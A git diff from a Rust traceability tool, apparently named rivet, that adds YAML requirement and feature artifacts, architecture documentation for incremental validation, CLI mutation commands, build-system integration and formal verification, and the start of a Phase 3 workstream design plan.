tags: [formal-verification, rocq, metamodel] + links: + - type: satisfies + target: REQ-030 + fields: + rationale: > + Rocq provides the deepest level of assurance — proving that the + validation rules themselves are mathematically consistent, not + just that the implementation is correct. Schema satisfiability + (rules don't contradict) is a property that cannot be proven + by testing or bounded model checking because it requires + universal quantification over all possible artifact configurations. + coq-of-rust translates Rust types to Rocq for specification. + alternatives: > + Lean4 via Aeneas translation. Viable alternative with better + metaprogramming but less Rust tooling maturity. F* via hacspec. + Good for cryptographic properties but less natural for domain + modeling. diff --git a/artifacts/features.yaml b/artifacts/features.yaml index 0961621..4b10454 100644 --- a/artifacts/features.yaml +++ b/artifacts/features.yaml @@ -299,7 +299,7 @@ artifacts: - id: FEAT-020 type: feature title: AADL browser rendering (spar WASM) - status: draft + status: approved description: > Render AADL component diagrams in the dashboard using a spar WASM module compiled for the browser. Provides interactive visualization @@ -577,3 +577,479 @@ artifacts: - type: satisfies target: REQ-020 tags: [cross-repo, dashboard] + + - id: FEAT-040 + type: feature + title: Conditional validation rules in schema YAML + status: draft + description: > + Extend schema YAML with conditional-rules block supporting when/then + syntax. The "when" clause matches field values (equals, matches regex, + exists). The "then" clause enforces required-fields and required-links. + Validation engine evaluates conditional rules after static rules. + tags: [validation, schema, phase-3] + links: + - type: satisfies + target: REQ-023 + - type: implements + target: DD-018 + fields: + phase: phase-3 + + - id: FEAT-041 + type: feature + title: "rivet impact command" + status: draft + description: > + Change impact analysis command that computes content hashes for all + artifacts, diffs against a baseline (commit, tag, or rivet.lock), + and walks the link graph to report transitively affected artifacts. + Supports --since, --baseline, and --format json flags. Dashboard + integration highlights impacted artifacts in graph and matrix views. + tags: [cli, traceability, baseline, phase-3] + links: + - type: satisfies + target: REQ-024 + - type: implements + target: DD-019 + fields: + phase: phase-3 + + - id: FEAT-042 + type: feature + title: sphinx-needs JSON adapter (needs-json) + status: draft + description: > + Import adapter for sphinx-needs needs.json export format. Reads + needs.json, applies configurable type-mapping and id-transform + rules from rivet.yaml, and produces rivet artifacts with mapped + types, converted links, and preserved fields. Handles sphinx-needs + specifics like nested content, docname metadata, and underscore IDs. + tags: [adapter, interchange, migration, phase-3] + links: + - type: satisfies + target: REQ-025 + - type: implements + target: DD-020 + fields: + phase: phase-3 + + - id: FEAT-043 + type: feature + title: Test traceability source scanner + status: draft + description: > + Scans test source code for rivet traceability markers (Rust attributes, + Python decorators, comment tags) and test result files (JUnit XML, + cargo test JSON). Injects ephemeral test nodes into the link graph + with verifies links to referenced artifacts. Supports configurable + marker patterns per language and a coverage report via + rivet coverage --tests. + tags: [testing, traceability, automation, phase-3] + links: + - type: satisfies + target: REQ-026 + - type: implements + target: DD-021 + fields: + phase: phase-3 + + - id: FEAT-044 + type: feature + title: Build-system dependency providers + status: draft + description: > + Pluggable providers that read cross-repo dependency information from + build system manifests. Bazel provider parses MODULE.bazel for + bazel_dep() and git_override() entries. Nix provider parses flake.lock + for input pins. Custom JSON provider reads SCORE-style known_good.json. + All providers resolve repo URLs, pinned commits, and workspace paths + for use by cross-repo linking and source code traceability scanning. + tags: [cross-repo, bazel, nix, phase-3] + links: + - type: satisfies + target: REQ-027 + - type: implements + target: DD-022 + fields: + phase: phase-3 + + - id: FEAT-045 + type: feature + title: "rules_rivet Bazel module and Nix flake" + status: draft + description: > + Distribute rivet as a Bazel module (rules_rivet) with a rivet_validate() + test rule, and as a Nix flake with binary package output. The Bazel rule + runs rivet validate as a bazel test target without pulling Sphinx, Python, + LLVM, or JDK into the dependency graph. The Nix flake provides + nix run and nix develop integration. + tags: [packaging, bazel, nix, phase-3] + links: + - type: satisfies + target: REQ-027 + - type: satisfies + target: REQ-007 + fields: + phase: phase-3 + + - id: FEAT-057 + type: feature + title: SVG graph viewer with fullscreen, resize, and pop-out + status: draft + description: > + Dashboard SVG graph views (link graph, STPA control structure, AADL + diagrams) get a dedicated viewer with fullscreen toggle (F11 or button), + pop-out to separate browser window, resizable container with drag + handles, zoom-to-fit button, and minimap for large graphs. Currently + SVGs are rendered inline with fixed dimensions and no way to enlarge + or isolate them. + tags: [dashboard, ui, graph, phase-3] + links: + - type: satisfies + target: REQ-007 + fields: + phase: phase-3 + + - id: FEAT-052 + type: feature + title: "rivet add — create artifacts from CLI" + status: draft + description: > + Create a new artifact from the command line with schema validation. + Auto-generates next available ID for the given type/prefix pattern. + Validates type exists in schema, required fields are present, status + is in allowed values. Appends to the appropriate YAML file based on + artifact type. Supports --type, --title, --status, --tags, --field, + and --description flags. Interactive mode prompts for required fields. + tags: [cli, mutation, phase-3] + links: + - type: satisfies + target: REQ-031 + - type: implements + target: DD-028 + fields: + phase: phase-3 + + - id: FEAT-053 + type: feature + title: "rivet modify — update artifact fields from CLI" + status: draft + description: > + Modify an existing artifact's fields, status, tags, title, or + description from the command line. Validates the artifact exists, + the new values conform to schema (allowed values, field types), + and the modification doesn't break link constraints. Supports + --set-field, --set-status, --set-title, --add-tag, --remove-tag. + tags: [cli, mutation, phase-3] + links: + - type: satisfies + target: REQ-031 + - type: implements + target: DD-028 + fields: + phase: phase-3 + + - id: FEAT-054 + type: feature + title: "rivet remove — delete artifacts from CLI" + status: draft + description: > + Remove an artifact by ID from its YAML file. Pre-validates that + no other artifacts link to the target (or --force to override + with a warning listing affected links). Updates the link graph + and reports any newly broken references. Refuses to remove + artifacts that are targets of traceability rules unless --force. + tags: [cli, mutation, phase-3] + links: + - type: satisfies + target: REQ-031 + - type: satisfies + target: SC-2 + - type: implements + target: DD-028 + fields: + phase: phase-3 + + - id: FEAT-055 + type: feature + title: "rivet link / unlink — manage artifact links from CLI" + status: draft + description: > + Add or remove links between artifacts from the command line. + rivet link --type --target + validates that both artifacts exist, the link type exists in + the schema, the link type is valid for the source and target + artifact types, and cardinality constraints are not violated. + rivet unlink removes an existing link with the same validations. + Supports cross-repo references (prefix:ID syntax). + tags: [cli, mutation, traceability, phase-3] + links: + - type: satisfies + target: REQ-031 + - type: satisfies + target: SC-1 + - type: implements + target: DD-028 + fields: + phase: phase-3 + + - id: FEAT-056 + type: feature + title: "rivet next-id — compute next available artifact ID" + status: draft + description: > + Given an artifact type or ID prefix pattern, compute the next + available ID by scanning the store. Useful for scripting and + for the add command's auto-ID feature. rivet next-id --type requirement + returns REQ-031 (or whatever is next). rivet next-id --prefix FEAT + returns FEAT-057. Supports --format json for tooling integration. + tags: [cli, tooling, phase-3] + links: + - type: satisfies + target: REQ-031 + - type: satisfies + target: REQ-007 + fields: + phase: phase-3 + + - id: FEAT-046 + type: feature + title: MODULE.bazel rowan parser with Starlark subset grammar + status: draft + description: > + Hand-written lexer and recursive descent parser for the MODULE.bazel + Starlark subset. Produces rowan GreenNode CST with ~30 SyntaxKind + variants covering module(), bazel_dep(), git_override(), + archive_override(), local_path_override(), keyword arguments, + string/list/boolean literals, and comments. Error recovery produces + partial CST with diagnostic spans on malformed input. + tags: [parsing, rowan, bazel, phase-3] + links: + - type: satisfies + target: REQ-028 + - type: satisfies + target: REQ-027 + - type: implements + target: DD-023 + fields: + phase: phase-3 + + - id: FEAT-047 + type: feature + title: salsa validation database with incremental query groups + status: draft + description: > + Restructure the validation pipeline as salsa tracked queries. + Input queries for file contents, tracked queries for parse_artifacts, + merged_schema, artifact_store, link_graph, evaluate_conditional_rules, + and validate. Phased adoption alongside existing serde_yaml pipeline + with feature flag for opt-in. Enables incremental revalidation, + free change impact analysis, and LSP-ready architecture. + tags: [validation, salsa, architecture, phase-3] + links: + - type: satisfies + target: REQ-029 + - type: satisfies + target: REQ-023 + - type: implements + target: DD-024 + fields: + phase: phase-3 + + - id: FEAT-048 + type: feature + title: Conditional rule evaluation as salsa tracked queries + status: draft + description: > + Conditional validation rules (when/then syntax in schema YAML) + evaluated as individual salsa tracked queries per artifact-rule pair. + salsa dependency tracking ensures only affected rules re-evaluate + when an artifact field changes. Schema extension with + conditional-rules block supporting field equality, regex matching, + and existence checks in the when clause, and required-fields and + required-links in the then clause. + tags: [validation, schema, salsa, phase-3] + links: + - type: satisfies + target: REQ-023 + - type: implements + target: DD-018 + - type: implements + target: DD-024 + fields: + phase: phase-3 + + - id: FEAT-049 + type: feature + title: Kani proof harnesses for core algorithms + status: draft + description: > + 10-15 Kani proof harnesses proving panic freedom for core algorithms. + Targets: LinkGraph::build, parse_artifact_ref, Schema::merge, + validate cardinality checks, detect_circular_deps, MODULE.bazel + parser. CI job running Kani verification. Complements existing + proptest (random) and Miri (UB) with exhaustive bounded checking. + tags: [formal-verification, kani, testing, phase-3] + links: + - type: satisfies + target: REQ-030 + - type: implements + target: DD-025 + fields: + phase: phase-3 + + - id: FEAT-050 + type: feature + title: Verus soundness and completeness proofs for validation + status: draft + description: > + Verus requires/ensures annotations on core validation functions + proving soundness (PASS implies all rules satisfied) and completeness + (rule violated implies diagnostic emitted). Additional proofs for + backlink symmetry, conditional rule consistency, and reachability + correctness. Inline Rust annotations with SMT-based proof discharge. + tags: [formal-verification, verus, testing, future] + links: + - type: satisfies + target: REQ-030 + - type: implements + target: DD-026 + fields: + phase: future + + - id: FEAT-051 + type: feature + title: Rocq metamodel specification and satisfiability proofs + status: draft + description: > + Schema semantics modeled in Rocq via coq-of-rust translation of + Schema, TraceabilityRule, and ConditionalRule types. Theorems proven + for schema satisfiability (rules not contradictory), monotonicity + (adding artifacts preserves validity), link graph well-foundedness + (validation terminates), and ASPICE V-model completeness (schema + enforces full traceability chain). Serves as formal specification + for ISO 26262 TCL 1 tool qualification evidence. + tags: [formal-verification, rocq, metamodel, future] + links: + - type: satisfies + target: REQ-030 + - type: implements + target: DD-027 + fields: + phase: future + + - id: FEAT-052 + type: feature + title: LSP server for IDE integration + status: approved + description: > + Language Server Protocol server providing diagnostics (inline + validation errors/warnings), hover information (artifact metadata + preview), and go-to-definition navigation (jump to artifact + definitions) for YAML artifact files. Runs via `rivet lsp` on + stdin/stdout. + tags: [lsp, ide, developer-experience, phase-3] + links: + - type: satisfies + target: REQ-007 + fields: + phase: phase-3 + + - id: FEAT-053 + type: feature + title: SCORE metamodel schema + status: approved + description: > + Eclipse SCORE metamodel as a rivet schema, enabling validation of + SCORE project artifacts. Defines artifact types for the SCORE + V-model (TSF, workflows, requirements, components, FMEA/DFA, + test specs) with ASPICE-aligned traceability rules. + tags: [score, schema, eclipse, phase-3] + links: + - type: satisfies + target: REQ-010 + fields: + phase: phase-3 + + # --- AI agent ergonomics (from agent testing feedback) --- + + - id: FEAT-054 + type: feature + title: "rivet add --link: create artifact with links in one command" + status: draft + description: > + Allow --link "type:target" flags on rivet add to create an artifact + with links in a single command. Eliminates the 2-3 follow-up rivet + link calls needed per artifact today. Biggest friction point for + AI agent workflows creating 20+ artifacts. + tags: [cli, agent-ergonomics, mutations, phase-3] + links: + - type: satisfies + target: REQ-031 + fields: + phase: phase-3 + + - id: FEAT-055 + type: feature + title: "rivet batch: apply multiple mutations from YAML/JSON file" + status: draft + description: > + Batch mode that reads a YAML/JSON file of mutations (add, modify, + link, remove) and applies them atomically. Bridges the gap between + single-command CLI and hand-editing YAML for large artifact chains + (e.g., 20 artifacts + 40 links in one file). + tags: [cli, agent-ergonomics, mutations, phase-3] + links: + - type: satisfies + target: REQ-031 + fields: + phase: phase-3 + + - id: FEAT-056 + type: feature + title: "JSON output for validate, coverage, context, and diff" + status: draft + description: > + Add --format json flag to validate, coverage, context, and diff + commands. Machine-readable output lets AI agents parse results + programmatically without regex. JSON schema documented so agents + know the structure. + tags: [cli, agent-ergonomics, json, phase-3] + links: + - type: satisfies + target: REQ-042 + fields: + phase: phase-3 + + - id: FEAT-057 + type: feature + title: "rivet graph --depth N: local link neighborhood CLI" + status: draft + description: > + CLI command to show the link neighborhood of a specific artifact + within N hops. Prints upstream and downstream chain as a tree. + More focused than rivet matrix for investigating one artifact. + tags: [cli, graph, traceability, phase-3] + links: + - type: satisfies + target: REQ-004 + fields: + phase: phase-3 + + - id: FEAT-058 + type: feature + title: "rivet scaffold --chain: generate traceability skeleton" + status: draft + description: > + Given a root artifact and a sequence of types, generate draft + artifacts with the correct links forming a traceability chain. + E.g., rivet scaffold --chain CG-1 --through + "cybersecurity-req,cybersecurity-design,cybersecurity-implementation, + cybersecurity-verification" creates 4 linked draft artifacts. + tags: [cli, agent-ergonomics, automation, phase-3] + links: + - type: satisfies + target: REQ-031 + fields: + phase: phase-3 diff --git a/artifacts/requirements.yaml b/artifacts/requirements.yaml index af717f0..c190973 100644 --- a/artifacts/requirements.yaml +++ b/artifacts/requirements.yaml @@ -287,3 +287,340 @@ artifacts: fields: priority: should category: functional + + - id: REQ-023 + type: requirement + title: Conditional validation rules + status: draft + description: > + The validation engine must support conditional rules where field + requirements or link cardinality depend on the value of another field. + For example, an artifact with status "approved" must have a non-empty + verification-criteria field, or an artifact with safety level ASIL_B + must have mitigated_by links. This enables safety-critical constraint + enforcement that static per-type validation cannot express. + Contradictory conditional rules must be detected at schema load time. + tags: [validation, schema, safety] + links: + - type: satisfies + target: SC-12 + fields: + priority: should + category: functional + upstream-ref: "eclipse-score/docs-as-code#180" + + - id: REQ-024 + type: requirement + title: Change impact analysis + status: draft + description: > + The system must detect which artifacts changed between two baselines + or commits and compute the transitive set of downstream artifacts + affected via the link graph. This supports change management workflows + required by ASPICE SUP.10 and ISO 26262 part 8. + tags: [traceability, baseline, safety] + fields: + priority: should + category: functional + upstream-ref: "eclipse-score/docs-as-code#314, eclipse-score/process_description#535" + + - id: REQ-025 + type: requirement + title: sphinx-needs JSON import + status: draft + description: > + The system must import artifacts from the sphinx-needs needs.json + export format, mapping sphinx-needs types, links, and fields to + rivet schema types via configurable mappings. This provides a + migration path for projects using sphinx-needs-based toolchains. + tags: [interchange, adapter, migration] + fields: + priority: should + category: interface + upstream-ref: "eclipse-score/score#1695" + + - id: REQ-026 + type: requirement + title: Test-to-requirement traceability extraction + status: draft + description: > + The system must extract traceability markers from test source code + and test results, linking test cases to requirements without requiring + manual YAML maintenance. Must support language-specific markers + (attributes, decorators, comments) and test result formats (JUnit XML, + cargo test JSON). + tags: [testing, traceability, automation] + fields: + priority: should + category: functional + upstream-ref: "eclipse-score/score#2521, eclipse-score/score#2619" + + - id: REQ-027 + type: requirement + title: Build-system-aware cross-repo discovery + status: draft + description: > + The system must discover cross-repo dependencies from build system + manifests (Bazel MODULE.bazel, Nix flake.lock, or custom manifests) + rather than requiring manual external declarations. This includes + resolving pinned commits, workspace paths, and source code locations + across the dependency graph for traceability validation and source + code linking. + tags: [cross-repo, bazel, nix, traceability] + fields: + priority: should + category: functional + upstream-ref: "eclipse-score/reference_integration (known_good.json)" + + - id: REQ-028 + type: requirement + title: Diagnostic-quality parsing with lossless syntax trees + status: draft + description: > + All parsers for build-system manifests and configuration files must + produce lossless concrete syntax trees (CST) with full span information + for byte-exact error reporting. Parsers must recover from errors and + produce partial results rather than failing completely. Uses rowan + for CST representation, consistent with the spar AADL toolchain. + tags: [parsing, rowan, diagnostics] + links: + - type: satisfies + target: SC-13 + fields: + priority: must + category: non-functional + + - id: REQ-029 + type: requirement + title: Incremental validation via dependency-tracked computation + status: draft + description: > + The validation pipeline must support incremental recomputation where + changing a single artifact file only re-evaluates affected validation + rules, link graph edges, and coverage computations. Uses salsa for + dependency tracking, consistent with the spar AADL toolchain. This + enables sub-millisecond revalidation for IDE integration and efficient + conditional rule evaluation. Incremental results must be identical + to full validation results for the same inputs. + tags: [validation, salsa, incremental, performance] + links: + - type: satisfies + target: SC-11 + fields: + priority: must + category: non-functional + + - id: REQ-031 + type: requirement + title: Schema-validated artifact mutation from CLI + status: draft + description: > + The CLI must provide commands to create, modify, remove, link, and + unlink artifacts directly, with full schema validation at write time. + All mutations must validate the artifact ID is unique (or exists for + modify), the type exists in the loaded schema, required fields are + present, link targets exist, link types are valid for the source and + target types, and status values are in the allowed set. The CLI must + write valid YAML that preserves existing file formatting and comments + where possible. This eliminates the need for external agents or manual + YAML editing to maintain artifacts correctly. + tags: [cli, mutation, validation, safety] + links: + - type: satisfies + target: SC-1 + - type: satisfies + target: SC-2 + fields: + priority: must + category: functional + + - id: REQ-030 + type: requirement + title: Formal correctness guarantees for validation engine + status: draft + description: > + Core validation algorithms must have formal correctness proofs at + three levels. Bounded model checking (Kani) for panic freedom. + Functional correctness proofs (Verus) for validation soundness + and completeness. Metamodel semantic proofs (Rocq/coq-of-rust) + for schema satisfiability and rule consistency. These proofs + serve as ISO 26262 tool qualification evidence at TCL 1. + Proofs must verify the actual implementation, not a separate model. + tags: [formal-verification, safety, tool-qualification] + links: + - type: satisfies + target: SC-14 + fields: + priority: should + category: non-functional + + - id: REQ-032 + type: requirement + title: Markdown rendering in artifact descriptions + status: approved + description: > + Artifact descriptions rendered as CommonMark HTML via pulldown-cmark with tables, strikethrough, task lists, and code blocks. + tags: [rendering, markdown] + fields: + category: functional + priority: should + + - id: REQ-033 + type: requirement + title: Rich artifact embedding in documents with schema-driven link traversal + status: approved + description: > + Document embeds support modifiers (full, links, upstream, downstream, chain, table) with schema-driven link traversal. + tags: [documents, embedding, traceability] + fields: + category: functional + priority: should + + - id: REQ-034 + type: requirement + title: YAML 1.2.2 spec-compliant artifact file editing + status: approved + description: > + YAML artifact file editing uses indentation-aware parser per YAML 1.2.2 spec for lossless modification. + tags: [yaml, parsing, spec-compliance] + fields: + category: functional + priority: must + links: + - type: satisfies + target: SC-2 + + - id: REQ-035 + type: requirement + title: HTML export includes rendered documents with resolved embeds + status: approved + description: > + HTML export includes rendered documents with resolved wiki-links and artifact embeds as static pages. + tags: [export, documents] + fields: + category: functional + priority: must + + - id: REQ-036 + type: requirement + title: HTML export supports version switcher and homepage link + status: approved + description: > + HTML export supports runtime config.js for version switcher dropdown and homepage back-link. + tags: [export, navigation, versioning] + fields: + category: functional + priority: should + + - id: REQ-037 + type: requirement + title: Source code implementation traceability scanning + status: draft + description: > + The system must scan source code files (not just tests) for inline + traceability markers that link implementation code to artifacts. + Must support comment-based markers across multiple languages + (e.g., // Implements: REQ-001, # Satisfies: DD-005). Discovered + markers are injected as ephemeral nodes into the link graph, + following the same pattern as commit traceability (REQ-017) and + test traceability (REQ-026). This closes the gap between YAML + artifact specifications and actual implementation code. + tags: [traceability, source-code, automation] + fields: + priority: should + category: functional + upstream-ref: "OpenFastTrace source-code tag scanning (30+ languages)" + + - id: REQ-038 + type: requirement + title: Artifact revision tracking with link staleness detection + status: draft + description: > + Each artifact must carry a revision indicator (hash or explicit + version). When an artifact's content changes, all links targeting + that artifact from downstream artifacts must be flagged as stale + until the downstream artifact is reviewed and its link confirmed. + This is distinct from change impact analysis (REQ-024) which + operates between baselines — staleness operates per-link and + persists until explicitly cleared. Required by ISO 26262 part 8 + change management and ASPICE SUP.10. + tags: [traceability, change-management, safety] + fields: + priority: should + category: functional + upstream-ref: "OpenFastTrace revision-based outdated/predated link detection" + + - id: REQ-039 + type: requirement + title: Deep recursive coverage analysis + status: draft + description: > + The coverage engine must distinguish between shallow coverage + (direct covering link exists) and deep coverage (covering item + is itself fully covered, recursively). An artifact is deeply + covered only when all required covering items are themselves + deeply covered. Cycle detection must prevent infinite recursion. + This catches situations where a test covers a requirement, but + the test itself has unmet coverage needs at a lower level. + tags: [validation, coverage, traceability] + fields: + priority: should + category: functional + upstream-ref: "OpenFastTrace deep vs shallow coverage distinction" + + - id: REQ-040 + type: requirement + title: Variant and product-line artifact filtering + status: draft + description: > + Artifacts must support variant annotations that declare which + product variants or configurations an artifact applies to. + Validation, coverage, and matrix commands must accept a variant + filter that restricts the artifact graph to a specific variant. + This enables product-line engineering where a platform shares + most requirements but variants diverge on specifics. Variant + definitions are declared in rivet.yaml; artifacts reference + variants via a field or tag convention. + tags: [product-line, automotive, filtering] + fields: + priority: should + category: functional + upstream-ref: "sphinx-needs needs_variants for product-line engineering" + + - id: REQ-041 + type: requirement + title: Artifact overlay files + status: draft + description: > + The system must support overlay files that extend existing + artifacts without modifying the original source file. An overlay + can add tags, links, fields, or status changes to artifacts + defined in another file. Overlays are merged at load time and + validated against the schema like any other mutation. This + enables multi-team workflows where a safety team adds safety + tags or links to artifacts owned by the development team without + editing their files. + tags: [multi-team, extensibility, workflow] + fields: + priority: could + category: functional + upstream-ref: "sphinx-needs needextend directive for post-hoc modification" + + - id: REQ-042 + type: requirement + title: Structured export for external visualization tools + status: draft + description: > + The system must export artifact data, coverage metrics, and + traceability graphs in formats consumable by external visualization + and BI tools. This includes metrics JSON (artifact counts by + type/status, coverage percentages per rule, validation summary) + for Grafana or Power BI dashboards, and PlantUML source for + traceability graph rendering. The goal is integration with + existing visualization ecosystems rather than building charting + capabilities into rivet itself. + tags: [export, integration, visualization] + fields: + priority: could + category: interface + upstream-ref: "sphinx-needs PlantUML/Matplotlib visualizations — plugin approach instead" diff --git a/clippy.toml b/clippy.toml index b339f7c..f2c7fb1 100644 --- a/clippy.toml +++ b/clippy.toml @@ -1 +1 @@ -msrv = "1.85" +msrv = "1.89" diff --git a/docs/architecture.md b/docs/architecture.md index a054675..a613822 100644 --- a/docs/architecture.md +++ b/docs/architecture.md @@ -85,14 +85,22 @@ root: RivetSystem::RivetCli.Impl | `oslc` | OSLC client for discovery, query, CRUD, and sync (feature-gated) | | `wasm_runtime` | WASM component adapter runtime (feature-gated) | | `error` | Unified error type for the library | -| `formats/` | Format-specific adapters: `generic` (YAML), `stpa` (STPA YAML) | +| `formats/` | Format-specific adapters: `generic` (YAML), `stpa` (STPA YAML), `aadl` (spar JSON) | +| `embedded` | Embedded schema fallback for bundled schema access | +| `externals` | Cross-repository artifact linking | +| `lifecycle` | Artifact lifecycle state management | +| `commits` | Git commit traceability tracking | +| `proofs` | Kani bounded model checking proof harnesses | ### 2.2 rivet-cli Modules | Module | Purpose | |---------|----------------------------------------------------------------------| -| `main` | CLI entry point, clap argument parsing, subcommand dispatch | -| `serve` | axum HTTP server with HTMX-rendered dashboard pages | +| `main` | CLI entry point, clap argument parsing, subcommand dispatch | +| `serve` | axum HTTP server with HTMX-rendered dashboard pages | +| `lsp` | Language Server Protocol server (diagnostics, hover, go-to-definition) | +| `docs` | Documentation generation and browser commands | +| `schema_cmd` | Schema subcommand handling (list, show, verify) | ## 3. Data Flow @@ -266,13 +274,11 @@ traceability-rules: ### 5.2 Available Schemas -| Schema | Types | Link Types | Rules | Domain | -|-----------------|-------|------------|-------|--------------------------------| -| `common` | 0 | 9 | 0 | Base fields and link types | -| `dev` | 3 | 1 | 2 | Development tracking | -| `stpa` | 10 | 5 | 7 | STPA safety analysis | -| `aspice` | 14 | 2 | 10 | ASPICE v4.0 V-model | -| `cybersecurity` | 10 | 2 | 10 | SEC.1-4, ISO/SAE 21434 | +See [schemas.md](schemas.md) for the canonical schema reference table with +current type, link, and rule counts. Available schemas: `common` (base), +`dev` (requirements/features), `stpa` (safety analysis), `aspice` +(Automotive SPICE V-model), `cybersecurity` (SEC.1-4 / ISO 21434), `aadl` +(AADL architecture via spar). ### 5.3 Merge Semantics @@ -309,7 +315,103 @@ This architecture reflects the following key decisions: - [[DD-009]] -- Criterion benchmarks as KPI baselines - [[DD-010]] -- ASPICE 4.0 terminology and composable cybersecurity schema -## 8. Requirements Coverage +## 8. Phase 3 Architecture Extensions + +### 8.1 Incremental Validation (rowan + salsa) + +The validation pipeline (section 3) will be restructured as salsa tracked +queries ([[REQ-029]], [[DD-024]]). Each step in the current sequential +pipeline becomes a salsa query with automatic dependency tracking: + +``` +artifact_source(file) → parse_artifacts(file) → artifact_store() + ↓ ↓ +merged_schema() ────────────────→ evaluate_conditional_rules() + ↓ + link_graph() → validate() +``` + +When a file changes, salsa re-evaluates only affected queries. This enables: +- Sub-millisecond incremental revalidation for IDE integration +- Free change impact analysis ([[REQ-024]], [[DD-019]]) — impacted artifacts + are exactly the invalidated salsa queries +- Conditional rule evaluation ([[REQ-023]], [[DD-018]]) — rules re-fire only + when their dependent fields change + +rowan ([[REQ-028]], [[DD-023]]) provides lossless CST for new parsers +(MODULE.bazel, future schema/artifact parsers). Same architecture as spar. + +**STPA coverage:** H-9 (stale incremental results), SC-11 (incremental must +equal full validation), UCA-C-10..C-14, CC-C-10..C-14. + +### 8.2 CLI Mutation Commands + +New subcommands ([[REQ-031]], [[DD-028]]) for schema-validated artifact +mutation: `add`, `modify`, `remove`, `link`, `unlink`, `next-id`. + +Architecture: new `rivet-core/src/mutate.rs` module with `validate_mutation()` +pre-check before any file write. All mutations go through the full schema and +store validation before touching disk. + +**STPA coverage:** Satisfies SC-1 (validate cross-references before output) +and SC-2 (never silently discard artifacts). + +### 8.3 Build-System Integration + +Build-system providers ([[REQ-027]], [[DD-022]]) discover cross-repo +dependencies from Bazel MODULE.bazel or Nix flake.lock. The MODULE.bazel +parser ([[FEAT-046]]) uses rowan for a Starlark subset CST. + +Bazel integration path: +1. Parse MODULE.bazel directly (no Bazel install needed, rowan CST) +2. Optional: shell out to `bazel mod graph --output json` for resolved paths +3. Resolve external repo filesystem paths via `output_base/external/` + +Nix integration: parse `flake.lock` JSON with serde_json. + +Distribution: `rules_rivet` Bazel module and Nix flake ([[FEAT-045]]). + +**STPA coverage:** H-11 (parser misparse), SC-13 (reject unrecognized +constructs), UCA-C-15..C-17, CC-C-15..C-17. + +### 8.4 Formal Verification + +Three-layer verification pyramid ([[REQ-030]]): + +1. **Kani** ([[DD-025]], [[FEAT-049]]) — bounded model checking for panic + freedom. 10-15 proof harnesses for core algorithms. New CI job. +2. **Verus** ([[DD-026]], [[FEAT-050]]) — inline functional correctness proofs. + Validation soundness (PASS → all rules satisfied) and completeness (rule + violated → diagnostic emitted). +3. **Rocq** ([[DD-027]], [[FEAT-051]]) — metamodel semantic proofs via + coq-of-rust. Schema satisfiability, rule consistency, ASPICE V-model + completeness. + +**STPA coverage:** H-12 (proof-model divergence), SC-14 (proofs verify actual +implementation). + +### 8.5 Conditional Validation Rules + +Schema extension ([[REQ-023]], [[DD-018]], [[FEAT-040]]) with `when`/`then` +syntax for state-dependent validation. Rule consistency checking at schema +load time per SC-12. + +**STPA coverage:** H-10 (contradictory rules), SC-12 (verify rule consistency +before applying), UCA-C-12, CC-C-12. + +### 8.6 sphinx-needs Migration Path + +needs.json import adapter ([[REQ-025]], [[DD-020]], [[FEAT-042]]) with +configurable type mapping. SCORE metamodel as a rivet schema. Enables +zero-friction evaluation for sphinx-needs projects. + +### 8.7 Test-to-Requirement Traceability + +Source scanner ([[REQ-026]], [[DD-021]], [[FEAT-043]]) extracting traceability +markers from test code. Ephemeral injection into the link graph, same pattern +as commit traceability ([[DD-012]]). + +## 9. Requirements Coverage This document addresses the following requirements: @@ -321,3 +423,12 @@ This document addresses the following requirements: - [[REQ-008]] -- WASM component adapters (section 3.2) - [[REQ-009]] -- Test results as release evidence (section 6) - [[REQ-010]] -- Schema-driven validation (section 5) +- [[REQ-023]] -- Conditional validation rules (section 8.5) +- [[REQ-024]] -- Change impact analysis (section 8.1) +- [[REQ-025]] -- sphinx-needs JSON import (section 8.6) +- [[REQ-026]] -- Test-to-requirement traceability (section 8.7) +- [[REQ-027]] -- Build-system-aware cross-repo discovery (section 8.3) +- [[REQ-028]] -- Diagnostic-quality parsing with rowan (section 8.1) +- [[REQ-029]] -- Incremental validation via salsa (section 8.1) +- [[REQ-030]] -- Formal correctness guarantees (section 8.4) +- [[REQ-031]] -- Schema-validated CLI mutation (section 8.2) diff --git a/docs/getting-started.md b/docs/getting-started.md index 1d774dd..ec3bf7b 100644 --- a/docs/getting-started.md +++ b/docs/getting-started.md @@ -525,18 +525,22 @@ rivet serve Rivet tracks its own development. The repository root contains: ``` -rivet.yaml # Loads common + dev schemas +rivet.yaml # Loads common + dev + aadl + stpa schemas schemas/ common.yaml # Base link types dev.yaml # requirement, design-decision, feature types + aadl.yaml # AADL architecture types (spar integration) + stpa.yaml # STPA safety analysis types artifacts/ - requirements.yaml # 12 requirements - decisions.yaml # 6 design decisions - features.yaml # 12 features + requirements.yaml # Requirements + decisions.yaml # Design decisions + features.yaml # Features +safety/stpa/ # STPA analysis artifacts ``` -Run `rivet validate` in the repo root to validate 30+ artifacts with traceability -coverage checks. +Run `rivet validate` in the repo root to validate all artifacts with traceability +coverage checks. Run `rivet stats` for current counts — do not rely on hardcoded +numbers in documentation as they go stale immediately. ### STPA analysis diff --git a/docs/plans/2026-03-14-phase3-parallel-workstreams-design.md b/docs/plans/2026-03-14-phase3-parallel-workstreams-design.md new file mode 100644 index 0000000..9f12876 --- /dev/null +++ b/docs/plans/2026-03-14-phase3-parallel-workstreams-design.md @@ -0,0 +1,477 @@ +# Phase 3 Parallel Workstreams — Design + +## Goal + +Define 8 independent implementation workstreams that can execute concurrently, +covering SCORE adoption enablement, CLI mutation safety, incremental validation +architecture, formal verification, and build-system integration. + +## Dependency Graph + +``` +W1 (score schema) ──→ W3 (needs.json import) +W6 (MODULE.bazel) ──→ FEAT-044 (build-system providers, future) +W5 (conditional) ──→ salsa migration (future) + +All others are fully independent. +``` + +## Workstreams + +### W1 — SCORE Metamodel Schema (`schemas/score.yaml`) + +**Artifacts:** REQ-025 +**Effort:** Small (1-2 days) +**Unblocks:** W3 + +Translate Eclipse SCORE's public `metamodel.yaml` (50+ need types) into a +Rivet-compatible schema file. Covers SCORE's artifact types: + +- Process types: TSF, workflow, guidance, tool_req +- Requirements: stkh_req, feat_req, comp_req, aou_req +- Architecture: feat, comp, mod (static/dynamic views) +- Implementation: dd_sta, dd_dyn, sw_unit +- Safety: FMEA entries, DFA entries +- Testing: test_spec, test_exec, test_verdict +- Documents: doc, decision_record + +Link types: satisfies, complies, fulfils, implements, belongs_to, consists_of, +uses, violates, mitigated_by, fully_verifies, partially_verifies. + +**Testing:** Validate the schema loads and merges correctly. Integration test +importing a sample `needs.json` from SCORE's public documentation builds. + +**Architecture notes:** The schema file follows 